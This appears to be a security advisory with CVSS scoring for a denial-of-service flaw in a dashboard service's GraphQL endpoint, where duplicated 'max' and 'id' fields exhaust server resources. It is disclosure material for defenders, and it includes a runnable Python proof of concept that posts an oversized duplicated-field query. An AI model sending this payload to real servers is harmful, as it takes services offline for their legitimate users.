CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
AI Score
Confidence
High
EPSS
Percentile
9.2%
A denial of service (DoS) attack by field duplication in GraphQL is a type of attack where an attacker exploits the flexibility of GraphQL to overwhelm a server by requesting the same field multiple times in a single query. This can cause the server to perform redundant computations and consume excessive resources, leading to a denial of service for legitimate users.
Request to the endpoint /graphql are sent when visualizing graphs generated at a dashboard:
By modifying the data sent and duplicating many times the fields a DoS attack is possible.
The goal is to create a payload that generates a body like this, where the ‘max’ field is duplicated many times, each with the ‘id’ field duplicated many times inside it.
{'query': 'query { query_4f4722ea: test_table_aggregated { max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } } }'}
Although that payload seems harmless, a bigger one leaves the service unresponsive.
The following code might serve as a PoC written in Python3:
# GitHub @asantof
import requests
## CHANGE THIS VALUES: url, auth_token, query_name, collection_name
url = 'http://0.0.0.0:8055/graphql'
auth_token = ''
query_name = 'query_XXXXX'
collection_name = ''
headers = {
'Content-Type': 'application/json',
'Authorization': f'Bearer {auth_token}',
}
id_payload = 'id ' * 200
max_payload = 'max {' + id_payload + ' } '
full_payload = max_payload * 200
data = {
'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }'
}
print(data)
response = requests.post(url, headers=headers, json=data)
print(response.json())
After running it the service will be unresponsive for a while:
The vulnerability impacts the service’s availability by causing it to become unresponsive for a few minutes. An attacker could continuously send this request to the server, rendering the service unavailable indefinitely.
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
AI Score
Confidence
High
EPSS
Percentile
9.2%